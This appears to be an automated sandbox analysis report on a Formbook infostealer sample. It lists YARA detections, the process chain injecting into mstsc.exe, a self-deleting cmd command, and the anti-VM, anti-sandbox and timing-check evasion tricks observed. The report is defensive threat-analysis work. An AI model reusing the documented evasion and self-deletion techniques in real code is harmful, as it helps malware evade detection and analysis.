Source: 00000004.00000002.355743155.0000000001530000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000015.00000002.500868398.0000000000B40000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000015.00000002.500868398.0000000000B40000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.354554350.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.354554350.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.355839034.0000000001560000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.355839034.0000000001560000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000015.00000002.500576631.0000000000B10000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000015.00000002.500576631.0000000000B10000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000015.00000002.499504854.00000000006F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000015.00000002.499504854.00000000006F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.260942195.0000000003AC9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.260942195.0000000003AC9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: classification engine

Classification label: mal100.troj.evad.winEXE@8/1@6/3

Source: C:\Users\user\Desktop\JFBlvEr5H9.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\JFBlvEr5H9.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7104:120:WilError_01

Source: JFBlvEr5H9.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\JFBlvEr5H9.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Source: C:\Users\user\Desktop\JFBlvEr5H9.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: JFBlvEr5H9.exe	Virustotal: Detection: 20%
Source: JFBlvEr5H9.exe	ReversingLabs: Detection: 21%

Source: unknown	Process created: C:\Users\user\Desktop\JFBlvEr5H9.exe 'C:\Users\user\Desktop\JFBlvEr5H9.exe'
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Process created: C:\Users\user\Desktop\JFBlvEr5H9.exe C:\Users\user\Desktop\JFBlvEr5H9.exe
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Process created: C:\Windows\SysWOW64\mstsc.exe C:\Windows\SysWOW64\mstsc.exe
Source: C:\Windows\SysWOW64\mstsc.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\JFBlvEr5H9.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Process created: C:\Users\user\Desktop\JFBlvEr5H9.exe C:\Users\user\Desktop\JFBlvEr5H9.exe	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Process created: C:\Windows\SysWOW64\mstsc.exe C:\Windows\SysWOW64\mstsc.exe	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\JFBlvEr5H9.exe'	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\JFBlvEr5H9.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: JFBlvEr5H9.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: JFBlvEr5H9.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: JFBlvEr5H9.exe

Static file information: File size 1336832 > 1048576

Source: JFBlvEr5H9.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x107000

Source: JFBlvEr5H9.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000006.00000000.295246596.000000000EC20000.00000002.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: JFBlvEr5H9.exe, 00000004.00000002.356142962.0000000001620000.00000040.00000001.sdmp, mstsc.exe, 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: JFBlvEr5H9.exe, 00000004.00000002.356142962.0000000001620000.00000040.00000001.sdmp, mstsc.exe
Source:	Binary string: mstsc.pdbGCTL source: JFBlvEr5H9.exe, 00000004.00000002.357368484.0000000003660000.00000040.00000001.sdmp
Source:	Binary string: mstsc.pdb source: JFBlvEr5H9.exe, 00000004.00000002.357368484.0000000003660000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000006.00000000.295246596.000000000EC20000.00000002.00000001.sdmp

Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Code function: 0_2_0054C9C6 push es; ret	0_2_0054CB53
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Code function: 0_2_0054C976 push es; retf 0001h	0_2_0054C9C3
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Code function: 0_2_0054C976 push es; ret	0_2_0054CB53
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Code function: 0_2_0054C976 push es; retn 0001h	0_2_0054CBA3
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Code function: 0_2_0054B673 push es; iretd	0_2_0054C833
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Code function: 0_2_0054B673 push es; retf	0_2_0054C973
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Code function: 0_2_0054B673 push es; retf 0001h	0_2_0054C9C3
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Code function: 0_2_0054C836 push es; retf	0_2_0054C973
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Code function: 0_2_0054B6C0 push es; iretd	0_2_0054C833
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Code function: 4_2_0041B2A2 push cs; ret	4_2_0041B2A3
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Code function: 4_2_0041B3F2 push eax; ret	4_2_0041B3F8
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Code function: 4_2_0041B3FB push eax; ret	4_2_0041B462
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Code function: 4_2_0041B3A5 push eax; ret	4_2_0041B3F8
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Code function: 4_2_0041B45C push eax; ret	4_2_0041B462
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Code function: 4_2_00415414 push esp; ret	4_2_00415416
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Code function: 4_2_00414F46 push cs; ret	4_2_00414F47
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Code function: 4_2_0041BF12 push dword ptr [8427D5C5h]; ret	4_2_0041C1FF
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Code function: 4_2_00415FC5 push ebp; ret	4_2_00415FC6
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Code function: 4_2_00A7C836 push es; retf	4_2_00A7C973
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Code function: 4_2_00A7C9C6 push es; ret	4_2_00A7CB53
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Code function: 4_2_00A7C976 push es; retf 0001h	4_2_00A7C9C3
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Code function: 4_2_00A7C976 push es; ret	4_2_00A7CB53
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Code function: 4_2_00A7C976 push es; retn 0001h	4_2_00A7CBA3
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Code function: 4_2_00A7B673 push es; iretd	4_2_00A7C833
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Code function: 4_2_00A7B673 push es; retf	4_2_00A7C973
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Code function: 4_2_00A7B673 push es; retf 0001h	4_2_00A7C9C3
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Code function: 4_2_00A7B6C0 push es; iretd	4_2_00A7C833
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B0D0D1 push ecx; ret	21_2_04B0D0E4
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_0070B2A2 push cs; ret	21_2_0070B2A3
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_0070B3F2 push eax; ret	21_2_0070B3F8
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_0070B3FB push eax; ret	21_2_0070B462

Source: initial sample

Static PE information: section name: .text entropy: 6.91186053545

Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM3

Show sources

Source: Yara match	File source: 00000000.00000002.259577263.0000000002E41000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: JFBlvEr5H9.exe PID: 2036, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: JFBlvEr5H9.exe, 00000000.00000002.259577263.0000000002E41000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: JFBlvEr5H9.exe, 00000000.00000002.259577263.0000000002E41000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\mstsc.exe	RDTSC instruction interceptor: First address: 00000000006F85E4 second address: 00000000006F85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\mstsc.exe	RDTSC instruction interceptor: First address: 00000000006F896E second address: 00000000006F8974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\JFBlvEr5H9.exe

Code function: 4_2_004088A0 rdtsc

4_2_004088A0

Source: C:\Users\user\Desktop\JFBlvEr5H9.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\JFBlvEr5H9.exe TID: 2372	Thread sleep time: -43107s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe TID: 3492	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Thread delayed: delay time: 43107			Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: explorer.exe, 00000006.00000000.290736367.000000000891C000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00dRom0
Source: mstsc.exe, 00000015.00000002.500310779.000000000097D000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAWH*
Source: explorer.exe, 00000006.00000000.310857796.0000000003710000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.290286328.0000000008270000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: JFBlvEr5H9.exe, 00000000.00000002.259577263.0000000002E41000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: JFBlvEr5H9.exe, 00000000.00000002.259577263.0000000002E41000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: JFBlvEr5H9.exe, 00000000.00000002.259577263.0000000002E41000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: mstsc.exe, 00000015.00000002.500386760.00000000009A8000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: JFBlvEr5H9.exe, 00000000.00000002.259577263.0000000002E41000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: explorer.exe, 00000006.00000000.303415841.00000000011B3000.00000004.00000020.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: JFBlvEr5H9.exe, 00000000.00000002.259577263.0000000002E41000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000006.00000000.290828645.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 00000006.00000000.280280009.00000000053C4000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 00000006.00000000.290286328.0000000008270000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: mstsc.exe, 00000015.00000002.500386760.00000000009A8000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW,
Source: explorer.exe, 00000006.00000000.290286328.0000000008270000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000006.00000000.290828645.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: JFBlvEr5H9.exe, 00000000.00000002.259577263.0000000002E41000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: JFBlvEr5H9.exe, 00000000.00000002.259577263.0000000002E41000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: JFBlvEr5H9.exe, 00000000.00000002.259577263.0000000002E41000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: explorer.exe, 00000006.00000000.290286328.0000000008270000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\JFBlvEr5H9.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\JFBlvEr5H9.exe

Code function: 4_2_004088A0 rdtsc

4_2_004088A0

Source: C:\Users\user\Desktop\JFBlvEr5H9.exe

Code function: 4_2_00409B10 LdrLoadDll,

4_2_00409B10

Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AF90AF mov eax, dword ptr fs:[00000030h]	21_2_04AF90AF
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AE20A0 mov eax, dword ptr fs:[00000030h]	21_2_04AE20A0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AE20A0 mov eax, dword ptr fs:[00000030h]	21_2_04AE20A0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AE20A0 mov eax, dword ptr fs:[00000030h]	21_2_04AE20A0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AE20A0 mov eax, dword ptr fs:[00000030h]	21_2_04AE20A0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AE20A0 mov eax, dword ptr fs:[00000030h]	21_2_04AE20A0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AE20A0 mov eax, dword ptr fs:[00000030h]	21_2_04AE20A0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AEF0BF mov ecx, dword ptr fs:[00000030h]	21_2_04AEF0BF
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AEF0BF mov eax, dword ptr fs:[00000030h]	21_2_04AEF0BF
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AEF0BF mov eax, dword ptr fs:[00000030h]	21_2_04AEF0BF
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AB9080 mov eax, dword ptr fs:[00000030h]	21_2_04AB9080
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B33884 mov eax, dword ptr fs:[00000030h]	21_2_04B33884
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B33884 mov eax, dword ptr fs:[00000030h]	21_2_04B33884
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AC849B mov eax, dword ptr fs:[00000030h]	21_2_04AC849B
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B36CF0 mov eax, dword ptr fs:[00000030h]	21_2_04B36CF0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B36CF0 mov eax, dword ptr fs:[00000030h]	21_2_04B36CF0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B36CF0 mov eax, dword ptr fs:[00000030h]	21_2_04B36CF0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AB58EC mov eax, dword ptr fs:[00000030h]	21_2_04AB58EC
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B714FB mov eax, dword ptr fs:[00000030h]	21_2_04B714FB
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B4B8D0 mov eax, dword ptr fs:[00000030h]	21_2_04B4B8D0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B4B8D0 mov ecx, dword ptr fs:[00000030h]	21_2_04B4B8D0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B4B8D0 mov eax, dword ptr fs:[00000030h]	21_2_04B4B8D0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B4B8D0 mov eax, dword ptr fs:[00000030h]	21_2_04B4B8D0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B4B8D0 mov eax, dword ptr fs:[00000030h]	21_2_04B4B8D0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B4B8D0 mov eax, dword ptr fs:[00000030h]	21_2_04B4B8D0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B88CD6 mov eax, dword ptr fs:[00000030h]	21_2_04B88CD6
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AEBC2C mov eax, dword ptr fs:[00000030h]	21_2_04AEBC2C
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AE002D mov eax, dword ptr fs:[00000030h]	21_2_04AE002D
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AE002D mov eax, dword ptr fs:[00000030h]	21_2_04AE002D
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AE002D mov eax, dword ptr fs:[00000030h]	21_2_04AE002D
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AE002D mov eax, dword ptr fs:[00000030h]	21_2_04AE002D
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AE002D mov eax, dword ptr fs:[00000030h]	21_2_04AE002D
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04ACB02A mov eax, dword ptr fs:[00000030h]	21_2_04ACB02A
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04ACB02A mov eax, dword ptr fs:[00000030h]	21_2_04ACB02A
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04ACB02A mov eax, dword ptr fs:[00000030h]	21_2_04ACB02A
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04ACB02A mov eax, dword ptr fs:[00000030h]	21_2_04ACB02A
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B37016 mov eax, dword ptr fs:[00000030h]	21_2_04B37016
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B37016 mov eax, dword ptr fs:[00000030h]	21_2_04B37016
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B37016 mov eax, dword ptr fs:[00000030h]	21_2_04B37016
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B84015 mov eax, dword ptr fs:[00000030h]	21_2_04B84015
